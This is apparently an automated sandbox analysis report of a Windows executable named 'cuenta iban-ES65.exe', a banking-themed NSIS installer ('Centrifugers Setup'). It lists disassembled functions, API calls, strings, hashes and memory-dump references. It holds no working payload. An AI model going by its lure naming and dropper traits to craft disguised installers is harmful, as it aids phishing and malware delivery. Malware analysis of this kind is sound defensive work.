API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\cuenta iban-ES65.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-1210478865
Opcode ID: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
Instruction ID: e323e08bdfda0f150b574f83967a69ba6361760ee6a09b3ffc5edc4c10c5e242
Opcode Fuzzy Hash: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
Instruction Fuzzy Hash: 01118F91808B926EFB3216244C44B7BAF898B577A4F18007BE5C5722C2DA7C5C429B6E

Uniqueness

Uniqueness Score: -1.00%

Function 00403F58 Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000EB), ref: 00403F75
GetSysColor.USER32(00000000), ref: 00403F91
SetTextColor.GDI32(?,00000000), ref: 00403F9D
SetBkMode.GDI32(?,?), ref: 00403FA9
GetSysColor.USER32(?), ref: 00403FBC
SetBkColor.GDI32(?,?), ref: 00403FCC
DeleteObject.GDI32(?), ref: 00403FE6
CreateBrushIndirect.GDI32(?), ref: 00403FF0

Memory Dump Source

Source File: 00000000.00000002.13145407440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.13145364564.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145453641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13146430325.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cuenta iban-ES65.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
Instruction ID: 03c35b03fdde5f33accd48f8e357bf0732577442a8f103693b6bf1e6191b16fb
Opcode Fuzzy Hash: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
Instruction Fuzzy Hash: 71216271904705ABCB219F68ED48B4BBFF8AF01715B04892AF996A22E0D734EA04CB55

Uniqueness

Uniqueness Score: -1.00%

Function 100021FA Relevance: 10.6, APIs: 7, Instructions: 139memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 1000234A

Part of subcall function 10001224: lstrcpynA.KERNEL32(00000000,?,100012CF,-1000404B,100011AB,-000000A0), ref: 10001234

GlobalAlloc.KERNEL32(00000040,?), ref: 100022C3
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 100022D8
GlobalAlloc.KERNEL32(00000040,00000010), ref: 100022E7
CLSIDFromString.OLE32(00000000,00000000), ref: 100022F4
GlobalFree.KERNEL32(00000000), ref: 100022FB

Memory Dump Source

Source File: 00000000.00000002.13169077201.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.13169049421.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.13169106504.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.13169135539.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_cuenta iban-ES65.jbxd

Similarity

API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
String ID:
API String ID: 3730416702-0
Opcode ID: 8ca201b8c9dcbb45ad50e4cb45e4e1ae2e8a5d70f393ea2d6c63899163ff979d
Instruction ID: bfa8c22ebd78897ea4dc14f883c746723b208fa17a75ef0c69fbb79ff87ab60c
Opcode Fuzzy Hash: 8ca201b8c9dcbb45ad50e4cb45e4e1ae2e8a5d70f393ea2d6c63899163ff979d
Instruction Fuzzy Hash: B541ABB1108311EFF320DFA48884B5BB7F8FF443D1F218529F946D61A9DB34AA448B61

Uniqueness

Uniqueness Score: -1.00%

Function 100023DA Relevance: 10.6, APIs: 7, Instructions: 111COMMON

Download Yara Rule

APIs

Part of subcall function 10001215: GlobalAlloc.KERNEL32(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D

GlobalFree.KERNEL32(?), ref: 100024B5
GlobalFree.KERNEL32(00000000), ref: 100024EF

Memory Dump Source

Source File: 00000000.00000002.13169077201.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.13169049421.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.13169106504.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.13169135539.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_cuenta iban-ES65.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 8ed12168559ed504bf2d16f5614b25cf9b7800a5843296302d7a865f42518c80
Instruction ID: 4e6b36a645f71e2aed4a85f2c36ff1861f2741140ba068ae73f9b0a79c1593cf
Opcode Fuzzy Hash: 8ed12168559ed504bf2d16f5614b25cf9b7800a5843296302d7a865f42518c80
Instruction Fuzzy Hash: EA319CB1504250EFF322CF64CCC4C6B7BBDEB852D4B124529FA4193168CB31AC94DB62

Uniqueness

Uniqueness Score: -1.00%

Function 004047F0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040480B
GetMessagePos.USER32 ref: 00404813
ScreenToClient.USER32(?,?), ref: 0040482D
SendMessageA.USER32(?,00001111,00000000,?), ref: 0040483F
SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404865

Strings

f, xrefs: 00404841

Memory Dump Source

Source File: 00000000.00000002.13145407440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.13145364564.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145453641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13146430325.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cuenta iban-ES65.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
Instruction ID: d51aeaa30401db709ca0a87e6a09b4ddb89123452d3ebce91a639796f0b83af5
Opcode Fuzzy Hash: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
Instruction Fuzzy Hash: 54019275D00218BADB00DBA4CC41BFEBBBCAF85711F10412BBB10B71C0C7B465018BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00402B7F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B9A
MulDiv.KERNEL32(000DB779,00000064,000DD468), ref: 00402BC5
wsprintfA.USER32 ref: 00402BD5
SetWindowTextA.USER32(?,?), ref: 00402BE5
SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BF7

Strings

verifying installer: %d%%, xrefs: 00402BCF

Memory Dump Source

Source File: 00000000.00000002.13145407440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.13145364564.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145453641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13146430325.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cuenta iban-ES65.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 3ae07b054ad9b81f5b6108b272be1fee9de0c5ac9c6f7af5c303f160919c41b2
Instruction ID: 06d6233bfb864841df38fb05631849b064d35824abf3621066cb5e46443ac4cc
Opcode Fuzzy Hash: 3ae07b054ad9b81f5b6108b272be1fee9de0c5ac9c6f7af5c303f160919c41b2
Instruction Fuzzy Hash: EE014F70540209FBEF209F60DD4AEAE3B69AB04304F00803AFA16B92D0D7B8A951DB59

Uniqueness

Uniqueness Score: -1.00%

Function 004046E6 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(0079E540,0079E540,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404784
wsprintfA.USER32 ref: 0040478C
SetDlgItemTextA.USER32(?,0079E540), ref: 0040479F

Strings

@y, xrefs: 00404776
%u.%u%s%s, xrefs: 0040476E

Memory Dump Source

Source File: 00000000.00000002.13145407440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.13145364564.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145453641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13146430325.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cuenta iban-ES65.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$@y
API String ID: 3540041739-3020698753
Opcode ID: cedd47ab848f1e488b90f6cdfa530e5e3c90b5a13cd6639f012025bff0f45968
Instruction ID: 4638cabbc4a31f91baf710fec8468dae319bf79d1b1f68d9e24bb075fcb279e4
Opcode Fuzzy Hash: cedd47ab848f1e488b90f6cdfa530e5e3c90b5a13cd6639f012025bff0f45968
Instruction Fuzzy Hash: D911E7736041283BEB00656D9D45EEF328CDB86374F254237FA25F31D1EA78CC1146A8

Uniqueness

Uniqueness Score: -1.00%

Function 00401CDE Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 00401CE2
GetClientRect.USER32(00000000,?), ref: 00401CEF
LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D10
SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
DeleteObject.GDI32(00000000), ref: 00401D2D

Memory Dump Source

Source File: 00000000.00000002.13145407440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.13145364564.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145453641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13146430325.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cuenta iban-ES65.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 6926be61915e0fb459712a2c8d02a2c7f8cad9225e26cef3932069b61eeff660
Instruction ID: 92ae7547fb934e5b20a31b6555936ed9a04085bedc3b988c85494c1bea2cd4ea
Opcode Fuzzy Hash: 6926be61915e0fb459712a2c8d02a2c7f8cad9225e26cef3932069b61eeff660
Instruction Fuzzy Hash: CCF0E7B2A04114AFEB01ABE4DE88DAFB7BDFB54305B10446AF602F6191C7789D018B79

Uniqueness

Uniqueness Score: -1.00%

Function 00401D38 Relevance: 7.5, APIs: 5, Instructions: 38COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401D3B
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D48
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D57
ReleaseDC.USER32(?,00000000), ref: 00401D68
CreateFontIndirectA.GDI32(0040A7F0), ref: 00401DB3

Memory Dump Source

Source File: 00000000.00000002.13145407440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.13145364564.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145453641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13146430325.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cuenta iban-ES65.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: bf0e8217d613a89089dc93bce4a4cc97ba2f5610907d087a876188692ec465c3
Instruction ID: cf9238c777b6589bee1a324002302adcb4b1f2371c80511fc572ea77625e262b
Opcode Fuzzy Hash: bf0e8217d613a89089dc93bce4a4cc97ba2f5610907d087a876188692ec465c3
Instruction Fuzzy Hash: 96016232948740AFE7416B70AE1AFAA3FB4A755305F108479F201B72E2C67811569B3F

Uniqueness

Uniqueness Score: -1.00%

Function 00403951 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON

Download Yara Rule

APIs

SetWindowTextA.USER32(00000000,Centrifugers Setup), ref: 004039E9

Strings

1033, xrefs: 00403955, 0040395F, 004039D0
Centrifugers Setup, xrefs: 004039D8
"C:\Users\user\Desktop\cuenta iban-ES65.exe", xrefs: 00403952

Memory Dump Source

Source File: 00000000.00000002.13145407440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.13145364564.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145453641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13146430325.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cuenta iban-ES65.jbxd

Similarity

API ID: TextWindow
String ID: "C:\Users\user\Desktop\cuenta iban-ES65.exe"$1033$Centrifugers Setup
API String ID: 530164218-2773389876
Opcode ID: 3510cc6ce00ab04885f005c1ae9853ed867939ffbe97b1e5fcc982a599d3e754
Instruction ID: a7121fc51e20562cbfa027eee4ba04e2135699cbca2cdd3690fce58e300c9c30
Opcode Fuzzy Hash: 3510cc6ce00ab04885f005c1ae9853ed867939ffbe97b1e5fcc982a599d3e754
Instruction Fuzzy Hash: 8311D1B5B056108BE720DF15DC80A73776CEBC6755B28813FE841A73E1D73D9D028A98

Uniqueness

Uniqueness Score: -1.00%

Function 0040586C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00405D0C: lstrcpynA.KERNEL32(?,?,00000400,0040319A,Centrifugers Setup,NSIS Error), ref: 00405D19

Part of subcall function 00405817: CharNextA.USER32(?,?,Mundstykket.min,?,00405883,Mundstykket.min,Mundstykket.min,77303410,?,C:\Users\user\AppData\Local\Temp\,004055CE,?,77303410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405825
Part of subcall function 00405817: CharNextA.USER32(00000000), ref: 0040582A
Part of subcall function 00405817: CharNextA.USER32(00000000), ref: 0040583E

lstrlenA.KERNEL32(Mundstykket.min,00000000,Mundstykket.min,Mundstykket.min,77303410,?,C:\Users\user\AppData\Local\Temp\,004055CE,?,77303410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058BF
GetFileAttributesA.KERNEL32(Mundstykket.min,Mundstykket.min,Mundstykket.min,Mundstykket.min,Mundstykket.min,Mundstykket.min,00000000,Mundstykket.min,Mundstykket.min,77303410,?,C:\Users\user\AppData\Local\Temp\,004055CE,?,77303410,C:\Users\user\AppData\Local\Temp\), ref: 004058CF

Strings

Mundstykket.min, xrefs: 00405872, 00405877, 0040587D, 004058B8, 004058BE, 004058C6, 004058CE
C:\Users\user\AppData\Local\Temp\, xrefs: 0040586C

Memory Dump Source

Source File: 00000000.00000002.13145407440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.13145364564.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145453641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13146430325.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cuenta iban-ES65.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\$Mundstykket.min
API String ID: 3248276644-3047242854
Opcode ID: 2b232cbcfe35a2a259e0e65083c3ab1013c8774cdbeba63489dc7f6696da3121
Instruction ID: 819bf3b96d2f33be72422b420245a44e5a303c51be7f34a106cb995fc7f4ae7e
Opcode Fuzzy Hash: 2b232cbcfe35a2a259e0e65083c3ab1013c8774cdbeba63489dc7f6696da3121
Instruction Fuzzy Hash: B7F0CD27115D5119E61632361C05ABF1A58CE82364718C53FFC51F22D1EA3C8862DD7E

Uniqueness

Uniqueness Score: -1.00%

Function 0040577E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030D9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032DC), ref: 00405784
CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030D9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032DC), ref: 0040578D
lstrcatA.KERNEL32(?,00409014), ref: 0040579E

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040577E

Memory Dump Source

Source File: 00000000.00000002.13145407440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.13145364564.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145453641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13146430325.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cuenta iban-ES65.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3355392842
Opcode ID: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
Instruction ID: 68e0f27090206f37803ec84d28e37c7f09ebc5753c251fe5cd2e9e8878fbe2c1
Opcode Fuzzy Hash: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
Instruction Fuzzy Hash: 44D0A972606A307AE2022A15AC09E8F2A08CF62301B044433F200B22A2C63C4E418BFE

Uniqueness

Uniqueness Score: -1.00%

Function 00405817 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,?,Mundstykket.min,?,00405883,Mundstykket.min,Mundstykket.min,77303410,?,C:\Users\user\AppData\Local\Temp\,004055CE,?,77303410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405825
CharNextA.USER32(00000000), ref: 0040582A
CharNextA.USER32(00000000), ref: 0040583E

Strings

Mundstykket.min, xrefs: 00405818

Memory Dump Source

Source File: 00000000.00000002.13145407440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.13145364564.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145453641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
